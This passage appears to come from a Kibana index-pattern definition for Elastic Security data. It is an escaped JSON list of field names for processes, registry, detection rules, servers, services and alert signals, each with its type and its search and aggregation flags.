],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\